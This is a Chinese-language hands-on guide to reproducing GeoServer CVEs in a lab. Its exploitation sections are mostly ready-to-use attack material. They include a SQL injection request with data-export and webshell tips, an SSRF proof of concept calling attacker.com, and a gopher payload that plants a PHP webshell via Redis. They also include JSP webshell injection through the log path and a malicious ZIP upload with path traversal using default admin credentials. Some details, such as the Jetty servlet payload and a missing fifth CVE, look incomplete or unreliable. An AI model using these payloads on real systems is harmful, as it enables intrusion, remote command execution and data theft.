GeoServer漏洞复现实战：从SQL注入到SSRF的5个关键CVE解析（附环境搭建指南）

GeoServer漏洞复现深度指南：从环境搭建到实战利用

1. 环境准备与基础配置

在开始漏洞复现之前，我们需要搭建一个完整的GeoServer测试环境。以下是详细的配置步骤：

1.1 GeoServer安装与启动

首先从官网下载GeoServer 2.22.1版本（该版本包含多个历史漏洞）：

wget https://sourceforge.net/projects/geoserver/files/GeoServer/2.22.1/geoserver-2.22.1-bin.zip unzip geoserver-2.22.1-bin.zip cd geoserver-2.22.1/bin sh startup.sh

注意：确保系统已安装Java 8或11环境，可通过java -version验证

1.2 PostGIS环境配置

对于需要数据库交互的漏洞（如CVE-2023-25157），需配置PostgreSQL+PostGIS：

docker pull postgres:14 docker run -e POSTGRES_PASSWORD=password -p 5432:5432 -d postgres:14 docker exec -it [CONTAINER_ID] /bin/bash apt-get update && apt-get install -y postgis postgresql-14-postgis-3 psql -U postgres -c "CREATE EXTENSION postgis;"

1.3 必要扩展安装

部分漏洞需要WPS等扩展支持：

1. 下载WPS插件：

   wget https://sourceforge.net/projects/geoserver/files/GeoServer/2.22.1/extensions/geoserver-2.22.1-wps-plugin.zip

2. 将解压后的JAR文件复制到WEB-INF/lib目录
3. 重启GeoServer服务

2. CVE-2023-25157：SQL注入漏洞实战

2.1 漏洞原理分析

该漏洞存在于OGC Filter的解析过程中，影响以下过滤器类型：

漏洞核心在于GeoServer未对用户输入的CQL_FILTER参数进行充分过滤，导致恶意SQL语句被拼接执行。

2.2 完整复现步骤

1. 创建测试图层：

   • 工作区：vuln_test
   • 数据存储：PostGIS连接配置
   • 图层名称：test_layer，添加字符串类型属性name

2. 构造恶意请求：

   GET /geoserver/wfs?service=wfs&version=1.0.0&request=GetFeature &typeName=vuln_test:test_layer &CQL_FILTER=strStartsWith(name,'x'')=true AND 1=(SELECT CAST((SELECT version()) AS integer))-- HTTP/1.1

3. 观察响应中的数据库报错信息，包含PostgreSQL版本详情

2.3 漏洞利用技巧

• 信息收集：通过修改SELECT语句可获取数据库用户、表结构等信息
• 数据导出：使用COPY TO命令导出敏感数据
• 权限提升：利用PostgreSQL大对象函数写入webshell

提示：实际渗透中需先通过SELECT postgis_version()确认扩展安装情况

3. CVE-2023-43795：SSRF漏洞深度利用

3.1 WPS服务配置验证

首先确认WPS扩展已正确安装：

1. 访问/geoserver/web/管理界面
2. 左侧服务列表应显示"WPS"选项
3. 通过Demo > WPS Request Builder测试基本功能

3.2 SSRF漏洞利用链

标准POC：

POST /geoserver/wps HTTP/1.1 Host: target:8080 Content-Type: application/xml <wps:Execute xmlns:wps="http://www.opengis.net/wps/1.0.0"> <ows:Identifier>JTS:area</ows:Identifier> <wps:DataInputs> <wps:Input> <ows:Identifier>geom</ows:Identifier> <wps:Reference xlink:href="http://attacker.com"/> </wps:Input> </wps:DataInputs> </wps:Execute>

高级利用方式：

1. Redis未授权访问：

   <wps:Reference xlink:href="gopher://redis:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$56%0d%0a%0a%0a%3C%3Fphp%20system($_GET[%27cmd%27])%3B%20%3F%3E%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/www/html%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$9%0d%0ashell.php%0d%0a*1%0d%0a$4%0d%0asave%0d%0a"/>

2. 内网服务探测：

   for port in {1..65535}; do curl -X POST --data @poc.xml http://target/geoserver/wps \ --header "Content-Type: application/xml" \ --proxy http://127.0.0.1:$port done

4. CVE-2023-41877：从文件读取到RCE的完整链条

4.1 漏洞触发条件

需要满足两个前提：

1. 拥有管理员权限账户
2. 服务以Tomcat容器部署（Jetty不支持JSP解析）

4.2 分步利用过程

1. 修改全局日志路径：

   • 进入"全局设置" > "日志文件位置"
   • 将路径改为/var/lib/tomcat9/webapps/geoserver/logs/shell.jsp

2. 通过错误日志注入JSP代码：

   GET /geoserver/ows?service=wms&version=1.3.0 &request=<%Runtime.getRuntime().exec(request.getParameter("cmd"));%> HTTP/1.1

3. 访问生成的webshell：

   GET /geoserver/logs/shell.jsp?cmd=id HTTP/1.1

4.3 针对Jetty的替代方案

当服务使用Jetty时，可通过XML部署描述文件实现RCE：

1. 修改日志路径为：

   /var/lib/jetty/webapps/geoserver/WEB-INF/web.xml

2. 注入恶意Servlet配置：

   <servlet> <servlet-name>Command</servlet-name> <jsp-file><%= Runtime.getRuntime().exec(request.getParameter("cmd")) %></jsp-file> </servlet>

5. CVE-2023-51444：文件上传漏洞的曲折利用

5.1 漏洞前置知识

该漏洞涉及ImageMosaic数据源的三个关键特性：

1. 允许通过REST API管理栅格数据
2. 支持ZIP文件自动解压
3. 路径校验逻辑存在缺陷

5.2 完整复现流程

1. 准备恶意ZIP包：

   mkdir -p WEB-INF/classes/ echo '<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>' > shell.jsp zip -r exploit.zip WEB-INF/ shell.jsp

2. 分步执行攻击：

   # 步骤1：创建存储 curl -u admin:geoserver -XPOST -H "Content-type: text/xml" \ -d '<coverageStore><name>exploit</name><workspace>sf</workspace></coverageStore>' \ "http://target/geoserver/rest/workspaces/sf/coveragestores" # 步骤2：上传ZIP curl -u admin:geoserver -XPUT -H "Content-type: application/zip" \ --data-binary @exploit.zip \ "http://target/geoserver/rest/workspaces/sf/coveragestores/exploit/file.imagemosaic" # 步骤3：路径穿越 curl -u admin:geoserver -XPUT -H "Content-type: text/xml" \ -d '<coverageStore><url>file:/var/lib/tomcat9/webapps/geoserver/</url></coverageStore>' \ "http://target/geoserver/rest/workspaces/sf/coveragestores/exploit/external.imagemosaic"

5.3 实际渗透中的变通方法

当标准POC失效时，可尝试：

1. 使用已有合法ImageMosaic的配置文件
2. 通过/etc/passwd等文件确定绝对路径
3. 结合其他漏洞获取路径信息

在测试环境中，发现通过修改url参数为file:data/../../webapps/geoserver/也可实现路径穿越